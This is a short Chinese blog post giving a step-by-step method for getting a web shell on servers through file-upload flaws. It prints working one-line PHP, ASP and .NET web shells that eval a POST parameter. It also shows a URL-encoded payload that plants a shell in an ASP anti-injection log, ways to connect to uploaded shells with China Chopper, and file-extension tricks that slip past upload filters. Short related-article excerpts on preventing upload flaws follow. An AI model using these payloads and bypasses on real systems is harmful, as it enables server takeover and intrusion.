【Web】内部文件上传系统漏洞分析溯源(获取shell)

约定不等于承诺〃 2022-05-18 03:36 227阅读 0赞

【准备工具】

1.中国菜刀 (可以去官网下载)

官网:http://www.maicaidao.co/ (不建议使用)

https://download.csdn.net/download/u014549283/10570976

2.BurpPro

3.火狐浏览器的FoxyProxy Standard插件

【技术要点】

1.新建一句话代码,比如1.txt,内容选择如下

PHP: <?php @eval($_POST[‘pass’]);?>
ASP: <%eval request(“pass”)%>
.NET: <%@ Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%>

在实际使用过程中,替换PASS为链接的时候需要的密码。(pass是后面菜刀链接时候编辑框网址后面的内容)

2.截包,改上传文件名称,获取最后的路径

3.菜刀连接即可,注意其中的参数填写!

【access通用防注入】(asp为例)

1文件记录在sqlin.asp文件 中,我们在可注入的php的参数中 加上

?id=1 and 1=<%eval request(“pass”)%>

发现无法记录,于是将一句话木马进行url编码

(在线URL编码 http://tool.oschina.net/encode?type=4)

即id=1 and 1=%3C%25eval%20request(%22pass%22)%25%3E

记录成功,然后用菜刀连接sqlin.asp即可。

【模式2】

对于index.php?t=upload.php这种上传后有路径提示的

70

菜刀连接的格式如下

  1. index.php?t=upload/1.php

70 1

【模式3】

原题https://www.mozhe.cn/bug/detail/cVNveEMvWDA2aHMydDNYNkJmUVdPUT09bW96aGUmozhe

上传cer文件(内容为一句话木马),然后用菜刀连接。

【上传SHELL绕过检测】

1.例如asp马,可以把文件后缀名改为 1.asp;jpg 或者1.asp;.jpg 或者 1.asp;0jpg

发表评论

表情:
评论列表 (有 0 条评论,227人围观)

还没有评论,来说两句吧...

相关阅读

    相关 文件漏洞详解

    0x01 上传漏洞定义 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有

    相关 文件漏洞概述

    文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力,这种攻击方式是最为直接和有效的,有时候几乎没有什么技术门槛。 文件上传后导致的常

    相关 预防文件漏洞

    预防文件上传漏洞 1.为了防范用户上传恶意的可执行文件和脚本,以及将文件上传服务器当做免费的文件存储服务器使用,需要对上传的文件类型进行白名单(非黑名单,这点非常重要)校